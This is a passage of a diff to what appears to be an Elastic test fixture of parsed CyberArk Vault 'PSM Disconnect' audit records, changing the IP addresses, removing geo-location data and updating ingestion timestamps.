\u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:30\",\"IsoTimestamp\":\"2021-03-15T10:33:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813817400Z", + "original": "\u003c5\u003e1 2021-03-15T10:33:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:30\",\"IsoTimestamp\":\"2021-03-15T10:33:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1240,39 +1120,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -1289,7 +1148,7 @@ }, "@timestamp": "2021-03-15T10:34:50.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1300,16 +1159,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:34:50Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1321,14 +1179,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:01:13" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", 
@@ -1338,9 +1196,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 03:34:50", "desc": "PSM Disconnect" 
@@ -1352,8 +1210,8 @@ "event": { "severity": 2, "duration": 73000000000, - "ingested": "2021-06-09T10:24:31.624819600Z", - "original": "\u003c5\u003e1 2021-03-15T10:34:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:34:50\",\"IsoTimestamp\":\"2021-03-15T10:34:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813822700Z", + "original": "\u003c5\u003e1 2021-03-15T10:34:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:34:50\",\"IsoTimestamp\":\"2021-03-15T10:34:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1376,39 +1234,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -1425,7 +1262,7 @@ }, "@timestamp": "2021-03-15T11:12:09.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1436,16 +1273,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T11:12:09Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 